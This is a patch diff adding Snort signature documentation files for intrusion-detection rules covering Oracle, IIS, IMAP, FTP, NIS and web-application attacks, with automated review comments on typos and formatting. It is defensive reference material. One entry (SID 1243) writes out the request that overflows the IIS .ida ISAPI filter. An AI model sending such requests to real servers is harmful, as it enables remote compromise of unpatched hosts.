+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running PHP applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
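Review bot: this file is a verbatim copy of 1741.txt, including the typos "ona web server" and "attackers choosing"; fix both here as well, and add the product name and a reference so the two entries are distinguishable.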
--- /dev/null
+++ b/doc/signatures/1187.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1187
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
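Review bot: same as 1456.txt: "ona web server" typo, empty Affected Systems, empty Additional References, and body text identical to that file; name the product this SID covers.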
--- /dev/null
+++ b/doc/signatures/2751.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2751
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure comment_on_priority_group
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
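Review bot: same template problems as 2781.txt: "comment_on_priority_group" is split from its sentence by a newline, "Oracle Oracle9i" repeats the vendor, and Additional References is empty.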
--- /dev/null
+++ b/doc/signatures/387.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+387
+
+--
+Summary:
+This event is generated when an internal server replies to an external request for network subnet mask information, which may allow an attacker to learn information about the network for use in later attacks. 
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+If an attacker sends an ICMP request to an internal server for address mask information (SID 389 should trigger when this activity is seen), an internal server may reply with subnet mask information.  This can provide an attacker with information about subnet mask configuration that can be useful for future attacks.
+
+--
+Affected Systems:
+Any system that responds to ICMP address mask requests.
+
+--
+Attack Scenarios:
+An attacker can send an ICMP request for subnet mask information to the internal network. The server replies, providing the attacker with information about network subnet configuration.
+
+--
+Ease of Attack:
+Simple. Tools that use this method of information gathering are freely available.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Use a packet filtering firewall that restricts ICMP type 17 (address mask requests) from entering the protected network, and restricts ICMP type 18 packets (address mask replies) from exiting the protected network.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski <matt.watchinski@sourcefire.com>
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0524
+
+ArachNIDS
+http://www.whitehats.com/cgi/arachNIDS/Show?_id=ids216
+
+--
--- /dev/null
+++ b/doc/signatures/1243.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+1243
+
+--
+Summary:
+This event is generated when an attempt is made to access the .ida Indexing Service ISAPI filter. 
+
+--
+Impact:
+Remote access.  This attack may allow execution of arbitrary commands in System context providing complete control of the server. 
+
+--
+Detailed Information:
+Microsoft Internet Information Service (IIS) installs several Internet Service Application Programming Interface (ISAPI) extensions.  A buffer overflow vulnerability exists because of improper buffer checking in the .ida ISAPI filter.  This may allow execution of arbitrary commands with System level access on the vulnerable server.  The Code Rode worm used this vulnerability to propagate.
+
+--
+Affected Systems:
+Windows NT 4.0 IIS 4.0
+Windows 2000 IIS 5.0
+Windows XP beta IIS 6.0 beta
+
+--
+Attack Scenarios:
+An attacker can craft a special HTTP request that can cause a buffer overflow.  
+
+--
+Ease of Attack:
+Simple. Send the following request to a vulnerable server:
+GET /a.ida?NNNN... HTTP/1.0 where 240 N's or other characters are supplied. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+
+Consider removing the .ida ISAPI filter if it is not necessary.
+ 
+Download and install the appropriate patch mentioned in the Microsoft bulletin.
+
+--
+Contributors:
+Original rule written by  Dr SuSE and C. Mayor. 
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids
+http://www.whitehats.com/info/IDS552
+
+CERT
+http://www.cert.org/incident_notes/IN-2001-08.html
+
+Microsoft
+http://www.microsoft.com/technet/security/bulletin/ms01-033.asp
+
+eEye Digital Security
+http://www.eeye.com/html/Research/Advisories/AD20010618.html
+
+
+--
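Review bot: Typo in Detailed Information: "The Code Rode worm used this vulnerability to propagate." should read "Code Red", the worm that exploited the .ida ISAPI overflow and is the subject of the CERT IN-2001-08 reference cited below. Corrective Action says "the patch mentioned in the Microsoft bulletin" without naming it; since the ms01-033 URL is already in Additional References, name MS01-033 in the action so it is self-contained. Minor: the reference label "Arachnids" is spelled "ArachNIDS" in other files of this patch, and the Ease of Attack line "GET /a.ida?NNNN... HTTP/1.0 where 240 N's or other characters are supplied." mixes the request and its explanation on one line; put the explanation on its own line.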
--- /dev/null
+++ b/doc/signatures/2687.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2687
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure validate
+. This procedure is included in
+sys.dbms_internal_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
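Review bot: Detailed Information has a sentence broken by what looks like a templating artifact: "vulnerability in the procedure validate" / ". This procedure is included in" / "sys.dbms_internal_repcat." leaves a line that starts with a period; join it as one sentence ("...in the procedure validate. This procedure is included in sys.dbms_internal_repcat."). Affected Systems reads "Oracle Oracle9i" (duplicated vendor name), and Additional References is empty even though Corrective Action tells the reader to apply "the appropriate vendor supplied patch"; a link to the relevant Oracle alert would make that actionable. The same artifact appears in 2720.txt and 2800.txt in this patch, so the generator rather than the individual files is probably what needs fixing.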
--- /dev/null
+++ b/doc/signatures/1735.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1735
+
+--
+Summary:
+This event is generated when a client on the protected network has 
+possibly visited a website containing a malicious link leading to
+disclosure of information on the client.
+
+--
+Impact:
+Information disclosure.
+
+--
+Detailed Information:
+Certain versions of Mozilla, Netscape and other browsers based on these
+may allow a malicious link to reveal information about the files and
+filesystem on a host.
+
+HTTP redirects are mishandled by the XMLHttpRequest object in some
+browsers, this may allow a malicious web server to retrieve information
+from the client host if the redirect points to a local file.
+
+--
+Affected Systems:
+	Eazel Nautilus 1.0.4
+	Galeon 1.2 and 1.2.1
+	Mozilla versions 0.9.7 to 1.0 RC1
+	Netscape versions 6.1 to 6.2.2
+
+--
+Attack Scenarios:
+A devious website admin creates a webpage with malicious code and 
+obtains sensitive information from a visiting user's web browser about 
+any file or filesystem on the host he wishes.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives: 
+None known
+
+--
+False Negatives: 
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com> 
+
+-- 
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/4628
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0354
+
+--
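Review bot: Comma splice in Detailed Information: "HTTP redirects are mishandled by the XMLHttpRequest object in some" / "browsers, this may allow a malicious web server to retrieve information"; split it into two sentences ("...in some browsers. This may allow..."). The CVE reference uses the retired CAN- prefix (CAN-2002-0354); CVE-2002-0354 is the current form. Several lines (Summary, Attack Scenarios, Contributors, the "--" before Additional References) carry trailing whitespace.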
--- /dev/null
+++ b/doc/signatures/408.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+
+Sid:
+408
+
+--
+
+Summary:
+This event is generated when a network host generates an ICMP Echo Reply in response to an ICMP Echo Request message.
+
+--
+
+Impact:
+Information-gathering.  An ICMP Echo Reply message is sent in response to an ICMP REcho Request message.  If the ICMP Echo Reply message reaches the requesting host it indicates that the replying host is alive.
+
+--
+
+Detailed Information:
+ICMP Type 0 Code 0 is the RFC defined messaging type for ICMP Echo Reply datagrams.  This type of message is used to determine if a host is active on the network.
+
+--
+
+Attack Scenarios:
+A remote attacker may use ICMP Echo Request datagrams to determine active hosts on the network in prelude of further attacks.
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Use ingress filtering to prevent ICMP Type 0 Code 8 messages from entering the network.
+
+--
+
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
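Review bot: Corrective Action names an ICMP type/code that does not exist: "Use ingress filtering to prevent ICMP Type 0 Code 8 messages from entering the network." Echo Request is Type 8 Code 0 and Echo Reply, this rule's subject per Detailed Information, is Type 0 Code 0; the line should say "Type 8 Code 0 (Echo Request)" for inbound filtering or "Type 0 Code 0 (Echo Reply)" for outbound, whichever direction the author means. Also: "an ICMP REcho Request message" in Impact is a typo, "in prelude of further attacks" in Attack Scenarios should be "as a prelude to further attacks", and this file has no Affected Systems section, unlike the rest of the patch.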
--- /dev/null
+++ b/doc/signatures/2720.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2720
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure add_column_group_to_flavor
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
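Review bot: Same generator artifact as 2687.txt: "vulnerability in the procedure add_column_group_to_flavor" / ". This procedure is included in" / "dbms_repcat." leaves a line beginning with a period; join it into one sentence. Affected Systems reads "Oracle Oracle9i" and Additional References is empty although Corrective Action tells the reader to apply a vendor patch.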
--- /dev/null
+++ b/doc/signatures/100000857.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000857
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "Professional Home Page Tools" application running on a webserver. Access to the file "class.php" with SQL commands being passed as the "ip" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "ip" parameter in the "class.php" script used by the "Professional Home Page Tools" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Professional Home Page Tools
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
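Review bot: Typo in the third Detailed Information paragraph: "a CGI application running ona web server" ("on a"). That paragraph is credential-validation boilerplate that does not describe this rule's subject (SQL injection via the "ip" parameter of "class.php"); keep only the sentences that apply. Minor: the Summary ends "an exploitation attempt has been attempted" (redundant; "an exploitation attempt has been made"), "attackers choosing" needs the possessive, and the blank lines the other files have after the Sid value and before the "--" that follows Affected Systems and Contributors are missing here.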
--- /dev/null
+++ b/doc/signatures/2031.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2031
+
+--
+Summary:
+The rpc.ypasswd service is used to update user information remotely. 
+This service should not be available outside the local area network, 
+external source.
+
+--
+Impact:
+This may be an intelligence gathering activity on available rpc services
+on a machine connected to external resources. The possibility also 
+exists that an attacker may already have gained access to a NIS server 
+and thus all resources connected to that host.
+
+--
+Detailed Information:
+A vulnerability exists in some versions of the rpc.ypasswd service that
+can lead to a remote root compromise of a vulnerable host. This activity
+may be an intelligence gathering exercise to ascertain wether or not the
+host is vulnerable to this attack.
+
+This activity may also indicate a possible compromise of a NIS server 
+via a legitimate user account the attacker has previously garnered. 
+Compromise of a master NIS server may present the attacker with easy 
+access to all NIS resources the machine is connected to.
+
+--
+Affected Systems:
+All systems running the rpc.ypasswd service.
+
+--
+Attack Scenarios:
+The attacker can make a request to update user information via 
+rpc.ypasswd.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disable the rpc.ypasswd daemon.
+
+Disallow all RPC requests from external sources and use a firewall to 
+block access to RPC ports from outside the LAN.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+SANS:
+http://www.sans.org/rr/unix/NIS.php
+http://www.sans.org/rr/unix/sec_solaris.php
+
+--
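Review bot: The Summary is a truncated sentence: "This service should not be available outside the local area network, " / "external source." Text is missing between the comma and "external source", so the sentence needs to be rewritten before this ships. Also "wether" in Detailed Information should be "whether", and the Summary does not actually say what the event is (every other file opens with "This event is generated when...").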
--- /dev/null
+++ b/doc/signatures/1976.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+1976
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow vulnerability associated with CesarFTPD FTP server DELE command. 
+
+--
+Impact:
+Remote access.  A successful attack may permit the remote execution of arbitrary commands with system privileges.
+
+--
+Detailed Information:
+CesarFTPD offers FTP servers for Windows hosts. A vulnerability exists with the DELE command that can cause a buffer overflow and permit the execution of arbitrary commands with system privileges. The buffer overflow can be caused by supplying an overly long argument to the DELE command.
+
+--
+Affected Systems:
+	Hosts running CesarFTP 0.98b.
+
+--
+Attack Scenarios:
+An attacker can supply an overly long file argument with the DELE command, causing a buffer overflow.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com> 
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0826
+
+Bugtraq:
+http://www.securityfocus.com/bid/2972
+
+--
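Review bot: Inconsistent product name: the Summary and Detailed Information say "CesarFTPD" while Affected Systems lists "Hosts running CesarFTP 0.98b."; use one spelling throughout. "CesarFTPD offers FTP servers for Windows hosts." is awkward ("CesarFTP is an FTP server for Windows hosts"), and the Summary is missing a possessive ("the CesarFTP FTP server's DELE command").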
--- /dev/null
+++ b/doc/signatures/1977.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+1977
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+NGS Whitepaper - Advanced SQL Injection
+www.nextgenss.com/papers/advanced_sql_injection.pdf
+
+--
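Review bot: The reference under Additional References lacks a URL scheme: "www.nextgenss.com/papers/advanced_sql_injection.pdf". Every other reference in this patch is a full http:// URL, so add the scheme for consistency and so link extraction picks it up. The reference is also specifically about SQL injection while the text describes generic web-server compromise; either add a sentence tying the two together or cite a more general reference.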
--- /dev/null
+++ b/doc/signatures/295.txt
@@ -0,0 +1,61 @@
+SID:
+295
+--
+
+Rule:
+--
+
+Summary:
+This event is triggered when an attempt is made to overflow an imapd 
+server.
+--
+
+Impact:
+Commands may be run on the IMAP server as the root user, This can lead 
+to a complete compromise of the targeted system
+--
+
+Detailed Information:
+Failure to check the size of the value passed to the 'AUTHENTICATE' 
+command on certain IMAPD implementations can lead to a buffer overflow. 
+This in turn can allow arbitrary commands to be executed on the server.
+--
+
+Affected Systems:
+	Netscape Messaging Server 3.55
+	University of Washington imapd 10.234
+--
+
+Attack Scenarios:
+An attacker may attempt to exploit a vulnerable imapd server, permitting
+the execution of arbitrary commands possibly with the privilege of user 
+"root".
+--
+
+Ease of Attack:
+simple. Sample exploit code is available.
+--
+
+False Positives:
+None known
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Vendors have provided updated versions, upgrading will resolve this 
+problem
+--
+
+Contributors:
+Snort documentation contributed by matthew harvey <indexone@yahoo.com>
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+--
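Review bot: This file uses a different layout from the rest of the patch: "SID:" comes before "Rule:", the header is spelled "SID" rather than "Sid", the blank-line pattern around the "--" separators is inverted, and the last section is "References:" where every other file uses "Additional References:". Anything that parses these files by section name will miss this one. Also: comma splice in Impact ("Commands may be run on the IMAP server as the root user, This can lead"), "simple." in Ease of Attack should be capitalised, and the Impact and Corrective Action sentences have no terminating period.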
--- /dev/null
+++ b/doc/signatures/1526.txt
@@ -0,0 +1,58 @@
+Rule:  
+
+--
+Sid:
+1526
+
+--
+Summary:
+This event is generated when an attempt is made to access the file sendmail.inc on a webserver running Basilix webmail.
+
+--
+Impact:
+Medium - Password disclosure: Depending if the attacker can use this login credentials to authenticate directly to a mysql database. Many Sun Cobalt Linux servers use Basilix webmail
+
+--
+Detailed Information:
+A webserver usually sends files in the webroot to an anonymous user without further processing. PHP scripts often include files (which contains configuration variables / functions etc.) that are not stored using a suffix that prevents the webserver sending them in clear text. ".inc" and ".class" suffix are not a handled by CGI properly and the file "sendmail.inc" is sent to the attacker. /inc/mysql.class can also be accessed and this would lead to a mysql user/password disclosure.
+
+Basilix is a webmail PHP script. Features are nice but it has some vulnerabilities (old versions).
+
+An attacker can access sendmail.inc file to obtain MySQL login and use it for further attacks.
+
+--
+Attack Scenarios:
+An attacker gets mysql.class containing database login credentials. If the webserver is shared by multiple users, the attacker which is also user for instance, can connect to the database server using the login provided by mysql.class file and modify the database. Often the password doesn't differ from FTP login, HTTP user authentication, etc. because the authentication is centralised by the OS.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+Sendmail.inc file doesn't exist or is handled by CGI which results probably in no output when an attacker tries to access the file.
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Update Basilix script (www.basilix.org)
+
+Check files which contain php code for a suffix that is handled by the webserver CGI, else the webserver sends this file plaintext to an attacker
+
+Workaround: register .inc and .class in the same way .php or .php3  .php4 are registered.
+Note: .class is used by java applets usually
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Additional Snort documentation contributed by unknown
+
+-- 
+Additional References:
+
+--
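Review bot: This file has no Affected Systems section even though the text names the software (Basilix webmail, "old versions") and a platform where it is common (Sun Cobalt Linux servers); add the section so the file matches the others. Grammar in Impact and Detailed Information: "Depending if the attacker can use this login credentials" ("these"), '".inc" and ".class" suffix are not a handled by CGI properly' (stray "a"; "suffixes are not handled"), and "the attacker which is also user for instance" ("who is also a user"). The Impact line also mixes the severity rating with an unrelated remark about Sun Cobalt; split them.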
--- /dev/null
+++ b/doc/signatures/1445.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+1445
+
+--
+
+Summary:
+This event is generated when an attempt is made to retrieve a file 
+called 'file_id.diz'
+
+--
+
+Impact:
+Such files are sometimes used on 'warez' sites to describe the contents 
+of a directory
+
+--
+
+Detailed Information:
+A lot of warez sites use small files called 'file_id.diz' to 
+describe the name of the release and the group which released the 
+software/material.
+
+--
+
+Affected Systems:
+Machines running ftp servers.
+
+--
+
+Attack Scenarios:
+After finding a ftp server containing illegal contents, the user 
+downloads the file 'file_id.diz' to verify the contents of a directory, 
+and then, if if the attacker chooses, other files in that directory.
+
+--
+
+Ease of Attack:
+Simple.
+
+--
+
+False Positives:
+Many shareware/freeware sites also use the 'file_id.diz' files to 
+describe the contents of their packages.
+
+--
+
+False Negatives:
+Warez sites might not use 'file_id.diz' files to describe the 
+directories, or might rename them.
+
+--
+
+Corrective Action:
+Verify the location and contents of the 'file_id.diz' files on your ftp 
+server and take appropriate action.
+
+--
+
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Snort documentation contributed by Chaos <c@aufbix.org>
+
+-- 
+
+Additional References:
+
+--
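Review bot: Duplicated word in Attack Scenarios: "and then, if if the attacker chooses, other files in that directory."; "a ftp server" in the same paragraph should be "an ftp server". The Impact section describes what the file is rather than the impact; the actual impact (the server may be hosting unauthorized content) is only implied by Corrective Action, so state it in Impact.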
--- /dev/null
+++ b/doc/signatures/1701.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1701
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
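Review bot: The Affected Systems section is empty ("Affected Systems:" followed directly by "--"); either fill it in (1977.txt in this patch uses "All systems using a web server." for its generic web rule) or state that it is not applicable, so the file does not look truncated. Typo in Detailed Information: "running ona web server" ("on a").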
--- /dev/null
+++ b/doc/signatures/2424.txt
@@ -0,0 +1,61 @@
+Rule:  
+
+--
+Sid:
+2424
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in ISC INN Usenet/NNTP server.
+
+--
+Impact:
+Execution of arbitrary code is possible.
+
+--
+Detailed Information:
+A vulnerability exists in the network news transport protocol server
+from ISC. It may be possible for a remote attacker to exploit a buffer
+overflow condition in the software to execute code of the attackers
+choosing with the privileges of the user running the daemon.
+
+--
+Affected Systems:
+	ISC INN 2.4 .0
+
+--
+Attack Scenarios:
+An attacker may send specially crafted packets to a vulnerable system to
+cause the overflow condition to occur. Once successful the attacker may
+attempt to escalate privileges by using further local exploits.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
